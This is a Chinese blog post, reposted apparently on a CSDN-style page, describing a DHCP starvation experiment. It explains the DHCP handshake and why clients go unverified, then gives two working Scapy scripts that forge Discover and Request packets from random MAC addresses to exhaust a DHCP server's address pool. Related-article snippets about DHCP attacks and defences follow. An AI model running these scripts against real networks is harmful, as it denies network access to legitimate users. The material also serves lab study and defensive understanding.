DHCP 泛洪攻击小实验

转载 于 2025-10-25 16:00:02 发布 · 21 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://www.cnblogs.com/qz-not-crazy/p/19165462
文章标签:

#it

DHCP 泛洪攻击

攻击原理:通过虚拟随机生成的mac 地址占用DHCP 服务器中的地址池达到正常机器无法获取到IP 地址从而无法上网

DHCP 协议原理

DHCP 是为了解决静态IP 地址,每次都需要进行手动输入IP的不方便

DHCP 客户端端口68 ,DHCP 服务端端口 67

  1. 首先Client 由于仅仅存在mac 地址,所以需要获取一个未占用的IP 用于进行标识身份上网

  2. 由于Client 并不知道DHCP Server 的IP和mac,所以会发送一个广播包 Discover(包内信息带有自身mac)

  3. DHCP Server 收到请求后,检查自身地址池,若存在空闲IP,向Discover 请求包源MAC 进行Offer 回包(默认为广播包,可以指定为单播包)

  4. Client 收到Offer 包后,进行筛选,筛选完成后确认该IP 地址,向DHCP Server 发起 Request 包用于确认该IP地址Request 包为广播包

  5. DHCP Server 收到Request 包后,在地址池中标记为此IP 已被使用,且保存其绑定的MAC 地址,进行ACK 确认包告知Client 无误

dhcp

思考:

为什么需要进行四次握手的方式才能获得IP?若是仅获取IP的话,完全可以Discover 包发起请求,Offer包回IP地址完成一次IP分配。

由于在真实的网络环境中,往往不会仅仅存在一台DHCP 服务器,而是存在多台的,若是采用Discover + Offer 的方式分配地址的话,会造成大量的IP 地址浪费,而Request 包作为广播就是为了告知所有的DHCP Server 不会使用其IP。从而不会造成地址的浪费;

漏洞点

整体从DHCP 的原理看下来,不难发现,在完成一个完整的IP 分配后,完全不会校验Client 的真实性;从而导致了一台Client 就可以伪造大量MAC 地址,按照DHCP 协议的四个数据包向Server 发起请求,即可完成占用完IP 地址池

DHCP 泛洪脚本

这里没有用到多线程的方式实现泛洪,而是采用一发一监听的方式实现泛洪(因为Client 总共发两个数据包 Discover + Request)

数据包的构建,只需要提供源MAC 即可,并在DHCP 包头标明数据包类型

xid : 用于标识数据包

src : 源mac/ip

dst : 目标mac/ip

BOOTP : DHCP 的最初协议,DHCP 就是基于BOOTP 升级的协议

/* by 01022.hk - online tools website : 01022.hk/zh/textflip.html */
from scapy.all import *
# xid 为一个客户端BOOTP 数据包的一个随机数字
for i in range(300):
	xid_random = random.randint(1,1000000000)
	mac_random = str(RandMAC())
	dhcp_discover = Ether(src=mac_random,dst="ff:ff:ff:ff:ff:ff")\
					/ IP(src = "0.0.0.0",dst = "255.255.255.255")\
					/ UDP(sport=68,dport=67)\
					/ BOOTP(chaddr=mac_random,xid=xid_random,flags=32768)\
					/ DHCP(options=[("message-type","discover"),"end"])
	sendp(dhcp_discover,iface="以太网 2")
	print("\n\n\nSending DHCPDISCOVER on" + "WLAN")
	time.sleep(1)

监听对应的物理网卡,筛选规则目标端口为DHCP 客户端从而可指定为Offer 或 ACK

这里需要取出关键的IP + Server IP + xid 即可,其余按照Request 包进行构建即可

/* by 01022.hk - online tools website : 01022.hk/zh/textflip.html */
from scapy.all import *
def dhcp_request(pkt):
        if pkt[DHCP].options[0][1]==2:
                Ether_Request = Ether(src=pkt[BOOTP].chaddr,dst = pkt[Ether].src)
                IP_Request = IP(src="0.0.0.0",dst="255.255.255.255")
                UPD_Request = UDP(sport=68,dport=67)
                BOOTP_Request = BOOTP(chaddr=pkt[BOOTP].chaddr,xid=pkt[BOOTP].xid)
                DHCP_Request = DHCP(options=[("message-type","request"),("server_id",pkt[IP].src),("requested_addr",pkt[BOOTP].yiaddr),"end"])
                Request = Ether_Request/IP_Request/UPD_Request/BOOTP_Request/DHCP_Request
                sendp(Request,iface="以太网 2")
                print(pkt[BOOTP].yiaddr+"正在分配")
        elif pkt[DHCP].options[0][1]==5:
                print(pkt[BOOTP].yiaddr+"已被分配")  
        else:
                print("所有的IP已被泛洪分配完毕")
sniff(iface="以太网 2",filter="port 67",prn=dhcp_request,count=500)
cmdos
关注
DHCP饥饿攻击解释及实验(MAC泛洪攻击DHCP DoS攻击)
墨痕诉清风的博客
07-11 1776
在弹出的窗口中填写攻击参数,服务器地址为Kali的IP地址,Start IPEnd IP写为非VMnet1中的IP地址,其他参数随意写,此时我们便对windows 10主机分配了一个虚假的ip, 使得其无法正常联网。攻击原理:攻击者通过伪造MAC地址持续大量地向DHCP服务器申请IP地址,直到耗尽DHCP服务器地址池的IP地址,使DHCP服务器无法再给正常的主机分配IP地址,使得正常主机不能访问网络。:转发代理(网关)IP 地址,DHCP 客户端发出请求报文后经过的第一个 DHCP 中继的 IP 地址。
使用kali下的yersinia工具进行DHCP泛洪攻击
L17707500994的博客
06-17 4800
实验的拓扑图: 路由器R1配置开启DHCP服务: R2配置DHCP中继(跨网段DHCP服务) 虚拟机中的win2003自动获取到R1路由器的DHCP服务(记得管理物理主机下的VM..DHCP服务否则会用虚拟机的DHCP服务) 在kali中使用Yersinia工具DHCP泛洪攻击后win2003无法获取到IP地址: 在kali使用yersinia工具开启DHCP欺骗后win2003获取到的IP地址: ...
DHCP欺骗泛洪攻击、如何防御DHCP欺骗攻击——DHCP snooping技术、DHCP snooping配置命令
热门推荐
qq_62311779的博客
01-30 1万+
目录 一、DHCP欺骗泛洪攻击 (1)钓鱼网站简介: (2)DNS的作用: (3)DHCP中继技术简介: (3-1)核心交换机DHCP配置命令: (4)dhcp欺骗详解: 第一步:pc2作为恶意攻击者会耗尽DHCP Sever的地址池,让DHCP Server不能给pc1分配地址池 第二步:pc2充当DNSDHCP欺骗pc1 图解: 二、如何防御及DHCP snooping配置命令 (一)开启DHCP SNOOPING之后的效果: (二)、配置命令 配置: 观察PC2无法重..
交换高级特性 —— DHCP snooping(DHCP欺骗泛红攻击)
qq_62311779的博客
08-17 4770
一、DHCP欺骗泛洪攻击 (1)钓鱼网站简介: (2)DNS的作用: (3)DHCP中继技术简介: (-1)核心交换机DHCP配置命令: (4)dhcp欺骗详解: 第一步:pc2作为恶意攻击者会耗尽DHCP Sever的地址池,让DHCP Server不能给p c1分配地址池 第二步:pc2充当DNSDHCP欺骗pc1 (4-1)图解: 二、防御——DHCP snooping (1)开启DHCP SNOOPING之后的效果: (2)配置案列.........
DHCPDHCPv6讲解(DHCP报文格式、DHCP中继、DHCP攻击)
m0_49864110的博客
06-06 1万+
攻击者发送大量恶意请求报文(修改DHCP报文中chaddr-客户端MAC地址字段),耗光DHCP服务器地址池中的地址(服务器也是根据chaddr来分配地址的,一个chaddr对应一个地址--而不是根据数据链路层的MAC地址来分配的)DHCP客户端向DHCP服务器发送报文时采用67端口号,DHCP服务器向DHCP客户端发送报文时采用68端口号(服务端监听的端口为67,客户端监听的端口为68)服务器对Request报文的确认响应报文(客户端收到此报文后,才真正获得了IP地址相关的配置信息)
DHCP服务器攻击详细步骤
Zeker62的博客
08-04 3110
攻击内容 本次攻击分为两个步骤: 攻击DHCP服务器,消耗地址池中的IP地址,让新来的主机不能获得IP。 伪装成DHCP服务器,采用中间人攻击,获取各种数据包。 攻击DHCP服务器:消耗地址池 建议在做攻击的时候使用两块网卡,一块可以正常上网,一块用作这一网络内的内部网卡, kali工具 dhcpstarv 使用 dhcpstarv -v -i eth1 (我在这一网络下的网卡就是eht1) 建议使用-v将攻击过程放到前台观看. 我们转到服务器上去看看,发现我们已经将地址池消耗的差不多了
DHCP攻击及防御
qq_43518594的博客
10-15 1万+
DHCP攻击 原理: DHCP攻击针对的目标是网络中的DHCP服务器,原理是耗尽DHCP服务器所有的IP地址资源,使其无法正常提供地址分配服务。然后在网络中再架设假冒的DHCP服务器为客户端分发IP地址,从而来实现中间人攻击。 DHCP工作过程: 工作过程分为四个阶段 发现阶段:首先客户端广播发送DHCP Discover报文来寻找DHCP服务器。 提供阶段:DHCP服务器接收到DHCP Discover报文后,查看自己的地址池中是否有可用地址,如果有,会在这个IP上做一个标记,并用DHCP Offer报
第二章,第二节-ICMP协议,ICMP重定向ICMP泛洪攻击
2302_78999016的博客
12-19 1568
TTL字段的意思是此帧数据可经过的最大节点数,每经过一个节点,TTL的值都会减1,直到为0,TTL值为0时,便会向原主机发送一个差错报告的ICMP报文,利用这个原理,我们就可以知道从原主机到目标主机中间经历了哪几个网关的转发以及这些网关的IP地址都是多少。原理:当一个主机收到icmp重定向信息时就会根据这个信息来更新自己的路由表,由于缺乏必要的合理性检查,黑客如果想要被攻击的受害机修改它的路由表,就可以发送icmp重定向信息给受害机,让受害机按照自己的需求来修改路由表,从而完成进一步攻击。
2-wireshark网络安全分析——MAC地址泛洪攻击
网络安全
02-01 4338
目录 1. MAC地址泛洪实验 2. 验证交换机泛洪 3. wireshark分析MAC地址泛洪 关于交换机原理的参考文章: 18-交换技术——交换机基础 22-交换技术——企业网络二层环路 1. MAC地址泛洪实验 实验目的:通过实践的方式了解一些常见的网络安全问题,同时加深理解交换机的工作原理。 学习思科交换机的时候我们知道,交换机里有一张mac...
网络协议与攻击模拟_08DHCP协议
fencecat的博客
01-24 1320
dhcp是应用层的协议,是基于传输层的UDP协议的,主机是向服务器的67号端口发送请求,服务器响应的是客户机的68号端口。
DHCP协议的工作过程DHCP攻击的原理防御方法:
weixin_44809632的博客
08-23 2553
.DHCP协议工作的四个过程: 1.注意: DHCP在提供服务时,DHCP客户端是以UDP 68号端口进行数据传输的,而DHCP服务器是以UDP 67号端口进行数据传输的。 2. 3. 发现阶段(DHCP客户端在网络中广播发送DHCP DISCOVER请求报文,发现DHCP服务器,请求IP地址租约) 提供阶段(DHCP服务器通过DHCP OFFER报文向DHCP客户端提供IP地址预分配) 选择阶段(DHCP客户端通过DHCP REQUEST报文确认选择第一个DHCP服务器为它提供IP地址自动分配服务)
配置DHCP Snooping的攻击防范功能
刘俊辉个人博客
09-05 591
如图所示,LSW1与LSW2是二层交换机,LSW3是用户网关,作为DHCP Relay向DHCP服务器转发DHCP报文,使得DHCP客户端可以从DHCP服务器上申请到IP地址等相关配置信息。为了为DHCP用户提供更优质的服务,网络管理员可以通过配置DHCP Snooping功能,实现DHCP攻击防范。
泛洪攻击以及防护方法
Jarvan_Song的博客
08-23 1万+
泛红攻击以及预防方法
DHCP协议原理分析与饥饿攻击的实现
Higher-Jing的博客
06-24 2055
DHCP(动态主机配置协议)是一个局域网的网络协议。指的是由服务器控制一段IP地址范围,客户机登录服务器时就可以自动获得服务器分配的IP地址子网掩码。
应急响应:DHCP$DNS劫持实战
8888的博客
10-09 1954
1.随机的攻击方式,在局域网内,通过构造一个假的DHCP服务器,在内网机器获取DHCP时看谁dhcp的响应速度快, 哪个快哪个就是DNS或者DHCP的IP地址,可以用于钓鱼(在同一局域网内)重定向到攻击机器的阿帕奇服务,这个就是DNS劫持,我们可以通过DNS劫持来进行构造钓鱼网站,因为这里只有两台机器可以上网,在实际情况中,可以构造一个登录页面。3.钓鱼:比如说你访问百度网页,你在DHCP配置中设置了百度跳转页面,受害者只要访问百度,就会重定向到其他网页,可以做一个登录框,进行攻击。
DHCP协议超详细解读(基于接口)
qjw15197487484的博客
03-18 1497
DHCP详细解读
攻击实验(ARP欺骗、MAC洪范、TCP SYN Flood攻击、DNS欺骗、DHCP饿死)
最新发布
2201_75767965的博客
08-10 1081
漏洞靶机集合选择需要的数量镜像打开设备上的驱动精灵安装网卡安装成功后查看IP地址、网关信息等。
以太网安全管理实验——DHCP欺骗与防御
w2361734601的博客
03-18 1118
将伪造的DHCP服务器接入交换机SW1,将其本地域名服务器地址设置为伪造的域名服务器的IP地址192.1.2.2。实施DHCP欺骗,使得PC1及PC2从伪造的DHCP服务器获取网络信息,从而通过伪造的DNS服务器完成域名www.a.com的解析过程,得到伪造的Web服务器的IP地址,从而导致访问到伪造的Web服务器。着网络技术的快速发展,以太网环境中的安全威胁日益增多,其中动态主机配置协议(DHCP)欺骗地址解析协议典型的网络层攻击手段。实验步骤(在配置DHCP前,先使用。PC1刷新显示欺骗成功。
网络安全实验79个.zip:DHCP与ARP攻击防御解析
常见DHCP攻击类型包括DHCP泛洪攻击DHCP仿冒攻击DHCP饥饿攻击等。在防御方面,可以采用动态ARP检测技术、设置安全的DHCP服务器、使用DHCP Snooping以及DHCP Snooping绑定表等方法。 动态ARP检测(DAD)是一种...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值